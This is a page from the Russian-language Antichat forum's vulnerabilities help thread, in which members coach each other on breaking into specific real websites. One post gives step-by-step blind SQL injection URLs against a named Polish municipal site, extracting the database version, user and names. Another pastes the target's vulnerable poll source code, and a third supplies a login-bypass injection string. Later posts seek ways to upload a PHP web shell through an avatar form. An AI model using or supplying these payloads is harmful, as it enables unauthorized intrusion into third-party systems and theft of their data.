HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 1817 из 2422 « Первая < 8171317171717671807 1813 1814 1815 1816 1817 1818 1819 1820 1821 1827186719172317 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 04.11.2011, 19:27
BigBear
Новичок
Регистрация: 04.12.2008
Сообщений: 11
С нами: 9176038

Репутация: 8
По умолчанию
Цитата:
Сообщение от vaddd  
http://www.mup.lublin.pl/db/popup.php?action=results&poll_ident=4%20order%20by %20123
как такое крутить? почему при order by 123 нет ошибки?
Тут Blind SQL

Крутить так:

Код:
http://www.mup.lublin.pl/db/popup.php?action=results&poll_ident=4+and+substring((version()),1,1)=4
4-ая версия. Печально.

Код:
http://www.mup.lublin.pl/db/popup.php?action=results&poll_ident=4+and+ascii(substring((user()),1,1))=109
User = mup@localhost

Код:
http://www.mup.lublin.pl/db/popup.php?action=results&poll_ident=4+and+ascii(substring((database()),1,1))=112
Database = praca

Теперь подбирай таблички так:

Код:
http://www.mup.lublin.pl/db/popup.php?action=results&poll_ident=4+and+exists(select+count(*)+from+praca.НАЗВАНИЕ_ТАБЛИЧКИ)
Если страничка отобразится нормально - ты подобрал =)
𝕏 Twitter Reddit Telegram Копировать ссылку
 
Ответить с цитированием

  #2  
Старый 04.11.2011, 19:53
Boolean
Участник форума
Регистрация: 05.09.2010
Сообщений: 147
С нами: 8255126

Репутация: 78
По умолчанию
Вот вам сорцы =)

PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if ([/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]is_valid_poll_id[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$poll_id[/COLOR][COLOR="#007700"])) {

[/COLOR][COLOR="#0000BB"]$voted[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]has_voted[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$poll_id[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$is_active[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]is_active_poll_id[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$poll_id[/COLOR][COLOR="#007700"]);

 if ([/COLOR][COLOR="#0000BB"]$action[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#DD0000"]"results"[/COLOR][COLOR="#007700"]&&[/COLOR][COLOR="#0000BB"]$poll_id[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#0000BB"]$poll_ident[/COLOR][COLOR="#007700"]) {

 return[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]view_poll_result[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$poll_id[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]);

 } elseif (![/COLOR][COLOR="#0000BB"]$is_active[/COLOR][COLOR="#007700"]) {

 return[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]view_poll_result[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$poll_id[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]);

 } elseif ([/COLOR][COLOR="#0000BB"]$is_active[/COLOR][COLOR="#007700"]&&[/COLOR][COLOR="#0000BB"]$voted[/COLOR][COLOR="#007700"]) {

 return[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]view_poll_result[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$poll_id[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]);

[/COLOR][/COLOR
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]function[/COLOR][COLOR="#0000BB"]is_valid_poll_id[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$poll_id[/COLOR][COLOR="#007700"]) {

[/COLOR][COLOR="#0000BB"]$poll_id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]intval[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$poll_id[/COLOR][COLOR="#007700"]);

 if ([/COLOR][COLOR="#0000BB"]$poll_id[/COLOR][COLOR="#007700"]>[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]) {

[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]fetch_array[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT poll_id FROM "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]tbl[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'poll_index'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]" WHERE poll_id=[/COLOR][COLOR="#0000BB"]$poll_id[/COLOR][COLOR="#DD0000"]AND status[/COLOR][COLOR="#0000BB"]db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]record[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'poll_id'[/COLOR][COLOR="#007700"]]) ?[/COLOR][COLOR="#0000BB"]true[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"];

 } else {

 return[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"];

 }

 }

[/COLOR][/COLOR
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]function[/COLOR][COLOR="#0000BB"]is_active_poll_id[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$poll_id[/COLOR][COLOR="#007700"]) {

[/COLOR][COLOR="#0000BB"]$poll_id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]intval[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$poll_id[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]fetch_array[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT * FROM "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]tbl[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'poll_index'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]" WHERE (poll_id='[/COLOR][COLOR="#0000BB"]$poll_id[/COLOR][COLOR="#DD0000"]' AND status=1)"[/COLOR][COLOR="#007700"]));

 if (![/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]record[/COLOR][COLOR="#007700"]) {

 return[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"];

 } elseif ([/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]record[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'expire'[/COLOR][COLOR="#007700"]]==[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]) {

 return[/COLOR][COLOR="#0000BB"]true[/COLOR][COLOR="#007700"];

 }

 return ([/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]record[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'exp_time'[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]poll_result_html[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]$poll_id[/COLOR][COLOR="#007700"]]) || !isset([/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]poll_result_html[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]$poll_id[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]template_set[/COLOR][COLOR="#007700"]])) {

[/COLOR][COLOR="#0000BB"]$pollvars[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]pollvars[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]fetch_array[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT * FROM "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]tbl[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'poll_index'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]" WHERE (poll_id = '[/COLOR][COLOR="#0000BB"]$poll_id[/COLOR][COLOR="#DD0000"]')"[/COLOR][COLOR="#007700"]));

 if (![/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"]) {

 return[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"];

 }

[/COLOR][COLOR="#0000BB"]$question[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'question'[/COLOR][COLOR="#007700"]];

[/COLOR][COLOR="#0000BB"]$VOTE[/COLOR][COLOR="#007700"]= ([/COLOR][COLOR="#0000BB"]$vote_stat[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]) ?[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]pollvars[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'voted'[/COLOR][COLOR="#007700"]] :[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$COMMENT[/COLOR][COLOR="#007700"]= ([/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'comments'[/COLOR][COLOR="#007700"]]==[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]) ?[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#0000BB"]template_set[/COLOR][COLOR="#DD0000"]','[/COLOR][COLOR="#0000BB"]$poll_id[/COLOR][COLOR="#DD0000"]','width=230,height=320,toolbar=no,statusbar=no'))\">"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]pollvars[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'send_com'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];

 eval([/COLOR][COLOR="#DD0000"]"\$result_html = \""[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]get_poll_tpl[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"result_head"[/COLOR][COLOR="#007700"]).[/COLOR][COLOR="#DD0000"]"\";"[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$loop_html[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]get_poll_tpl[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"result_loop"[/COLOR][COLOR="#007700"]);

 if (!isset([/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]options[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]$poll_id[/COLOR][COLOR="#007700"]])) {

[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]get_poll_data[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$poll_id[/COLOR][COLOR="#007700"]);

 }

[/COLOR][COLOR="#0000BB"]$maxvote[/COLOR][COLOR="#007700"]= ([/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]options[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]$poll_id[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'maxvote'[/COLOR][COLOR="#007700"]] ==[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]) ?[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]options[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]$poll_id[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'maxvote'[/COLOR][COLOR="#007700"]];

[/COLOR][COLOR="#0000BB"]$totalvotes[/COLOR][COLOR="#007700"]= ([/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]options[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]$poll_id[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'total'[/COLOR][COLOR="#007700"]] ==[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]) ?[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]options[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]$poll_id[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'total'[/COLOR][COLOR="#007700"]];

 for ([/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#007700"][/COLOR][COLOR="#0000BB"]options[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]$poll_id[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'option_id'[/COLOR][COLOR="#007700"]]);[/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#007700"]++) {

[/COLOR][COLOR="#0000BB"]$img_width[/COLOR][COLOR="#007700"]= (int) ([/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]options[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]$poll_id[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'votes'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#007700"]]*[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]pollvars[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'img_length'[/COLOR][COLOR="#007700"]]/[/COLOR][COLOR="#0000BB"]$maxvote[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$vote_count[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]options[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]$poll_id[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'votes'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#007700"]];

[/COLOR][COLOR="#0000BB"]$vote_percent[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]sprintf[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"%.2f"[/COLOR][COLOR="#007700"],([/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]options[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]$poll_id[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'votes'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#007700"]]*[/COLOR][COLOR="#0000BB"]100[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]$totalvotes[/COLOR][COLOR="#007700"]));

[/COLOR][COLOR="#0000BB"]$vote_val[/COLOR][COLOR="#007700"]= ([/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]pollvars[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'type'[/COLOR][COLOR="#007700"]] ==[/COLOR][COLOR="#DD0000"]"percent"[/COLOR][COLOR="#007700"]) ?[/COLOR][COLOR="#0000BB"]sprintf[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"%.1f"[/COLOR][COLOR="#007700"],([/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]options[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]$poll_id[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'votes'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#007700"]]*[/COLOR][COLOR="#0000BB"]100[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]$totalvotes[/COLOR][COLOR="#007700"])).[/COLOR][COLOR="#DD0000"]"%"[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]$vote_count[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$option_text[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]options[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]$poll_id[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'option_text'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#007700"]];

[/COLOR][COLOR="#0000BB"]$option_votes[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]options[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]$poll_id[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'votes'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#007700"]];

[/COLOR][COLOR="#0000BB"]$poll_color[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]options[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]$poll_id[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'color'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#007700"]];

 eval([/COLOR][COLOR="#DD0000"]"\$result_html .= \"[/COLOR][COLOR="#0000BB"]$loop_html[/COLOR][COLOR="#DD0000"]\";"[/COLOR][COLOR="#007700"]);

 }

[/COLOR][COLOR="#0000BB"]$total_votes[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]options[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]$poll_id[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'total'[/COLOR][COLOR="#007700"]];

 eval([/COLOR][COLOR="#DD0000"]"\$result_html .= \""[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]get_poll_tpl[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"result_foot"[/COLOR][COLOR="#007700"]).[/COLOR][COLOR="#DD0000"]"\";"[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]poll_result_html[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]$poll_id[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]template_set[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#0000BB"]$result_html[/COLOR][COLOR="#007700"];

 }

 return[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]poll_result_html[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]$poll_id[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]template_set[/COLOR][COLOR="#007700"]];

 }

[/COLOR][/COLOR
Собстна, учитывая что на сервере mg=ON, и версия mysql 4, то только blind sqli. on error based не прокатит.
 
Ответить с цитированием

  #3  
Старый 04.11.2011, 23:49
swat_
Новичок
Регистрация: 04.11.2009
Сообщений: 4
С нами: 8693835

Репутация: 0
По умолчанию
есть сайт ,при запросе вида ?action=doLogin&Username=1' выдаёт

Invalid query: select * from Users where Username='1'' AND Password=''

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' AND Password=''' at line 1

перепробовал кучу запросов , нехера не получается обойти авторизацию,каким запросом можно обойти авторизацию ?((

25cf%25e0%25f0%25ee%25eb%25fc%27%20or%20%28%282%29 %2b1%29%20 %201%20--%20&%c8%ec%ff что это за кодировка??? и это %c8%ec%ff'
 
Ответить с цитированием

  #4  
Старый 05.11.2011, 00:06
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
С нами: 9642449

Репутация: 606


По умолчанию
Цитата:
Сообщение от swat_  
есть сайт ,при запросе вида ?action=doLogin&Username=1' выдаёт
Invalid query: select * from Users where Username='1'' AND Password=''
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' AND Password=''' at line 1
перепробовал кучу запросов , нехера не получается обойти авторизацию,каким запросом можно обойти авторизацию ?((
например,

username = admin

password = 1' or 1=1 --

Цитата:
Сообщение от None  
25cf%25e0%25f0%25ee%25eb%25fc%27%20or%20%28%282%29 %2b1%29%20 %201%20--%20&%c8%ec%ff что это за кодировка???
urlencode
 
Ответить с цитированием

  #5  
Старый 05.11.2011, 00:25
SergioBlog
Новичок
Регистрация: 21.01.2011
Сообщений: 10
С нами: 8056406

Репутация: 0
По умолчанию
На одном сайте есть форма заливки аватара для юзеров, при заливке файла с расширением php все данные в файле заменяются на такую кашу

Цитата:
Сообщение от None  
ЪьЪЮJFIFЪЧ;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 90 ЪшC     ЪшC    Ъюdd"Ъд Ъд╣}!1AQa"q2│▒║ #B╠аRяП$3br┌ %&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz ┐└┘├┤┬┴┼▓⌠■∙√≈≤≥ ╒ё╓╔╕╖╗╘╙╡Ё╢╣╤╥╦╧ бцдефгхийрстужвьызАБЦДЕФ ГХИЙЯРСТУЖВЬЫЗЪд  Ъд╣w!1AQaq"2│B▒ ╠а #3RПbrя $4А%Я&'()*56789:CDEFGHIJSTUVWXYZcdefghijstu vwxyz┌┐└┘├┤┬┴┼▓⌠■∙√≈ ≤≥ ╒ё╓╔╕╖╗╘╙╡Ё╢╣╤╥╦╧ бцдефгхийрстужвьызБЦДЕФГ ХИЙРСТУЖВЬЫЗЪз ?Э╙╒┼(╒┼(╒┼(╒┼(╒┼(╒ ┼(╒┼(╒┼(╒┼(╒┼(╒┼(╒┼(╒ (╒┼(╒┼(╒┼(╒┼(╒┼(╒┼(╒ (╒┼(╒┼(╒┼(╒┼(╒┼(╒┼(╒┼ (╒┼(╒┼(╒┼(╒┼(╒┼(╒┼(╒┼( ╒┼(╒┼(╒┼(╒┼(╒┼(╒┼(╒┼( ┼(╒┼(╒┼(╒┼(╒┼(╒┼(╒┼( ┼(Ъы
урл аватара получается вида /images/avatar-13.php, то есть с таким расширением действительно загружается файл но содержимое его заменяется на дефолтную картинку что-ли. Может есть у кого идеи как обойти?
 
Ответить с цитированием

  #6  
Старый 05.11.2011, 00:31
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
С нами: 9642449

Репутация: 606


По умолчанию
Цитата:
Сообщение от SergioBlog  
На одном сайте есть форма заливки аватара для юзеров, при заливке файла с расширением php все данные в файле заменяются на такую кашу
урл аватара получается вида /images/avatar-13.php, то есть с таким расширением действительно загружается файл но содержимое его заменяется на дефолтную картинку что-ли. Может есть у кого идеи как обойти?
ты льешь напрямую шелл или jpg с кодом php?
 
Ответить с цитированием

  #7  
Старый 05.11.2011, 00:38
SergioBlog
Новичок
Регистрация: 21.01.2011
Сообщений: 10
С нами: 8056406

Репутация: 0
По умолчанию
Пробовал и так и так - результат один.
 
Ответить с цитированием

  #8  
Старый 05.11.2011, 00:46
SergioBlog
Новичок
Регистрация: 21.01.2011
Сообщений: 10
С нами: 8056406

Репутация: 0
По умолчанию
Хочу попробовать вот этот способ через мета данные картинки

_http://raz0r.name/articles/bezopasnost-zagruzhaemyx-izobrazhenij/

может выйдет что

Кто может разъяснить этот способ?

http://ha.ckers.org/blog/20070604/passing-malicious-php-through-getimagesize/

Может у кого есть мануал на русском или готовый вариант? Буду оч благодарен
 
Ответить с цитированием

  #9  
Старый 05.11.2011, 01:02
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
С нами: 9642449

Репутация: 606


По умолчанию
Цитата:
Сообщение от SergioBlog  
Хочу попробовать вот этот способ через мета данные картинки
_http://raz0r.name/articles/bezopasnost-zagruzhaemyx-izobrazhenij/
может выйдет что
Кто может разъяснить этот способ?
http://ha.ckers.org/blog/20070604/passing-malicious-php-through-getimagesize/
Может у кого есть мануал на русском или готовый вариант? Буду оч благодарен
бессмысленно, во-первых, изображения обрабатываются GD, которая уничтожит весь твой php-код.

во-вторых, ты сказал, что льешь php-шелл , а на выходе получаешь jpg-файл - такого быть не может, там что-то еще происходит.
 
Ответить с цитированием

  #10  
Старый 05.11.2011, 03:26
SergioBlog
Новичок
Регистрация: 21.01.2011
Сообщений: 10
С нами: 8056406

Репутация: 0
По умолчанию
Когда заливаю картинку - всё ок. Когда заливаю пхп скрипт то в файле с расширением .php оказывается картинка дефолтная.
 
Ответить с цитированием
Ответ
Страница 1817 из 2422 « Первая < 8171317171717671807 1813 1814 1815 1816 1817 1818 1819 1820 1821 1827186719172317 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
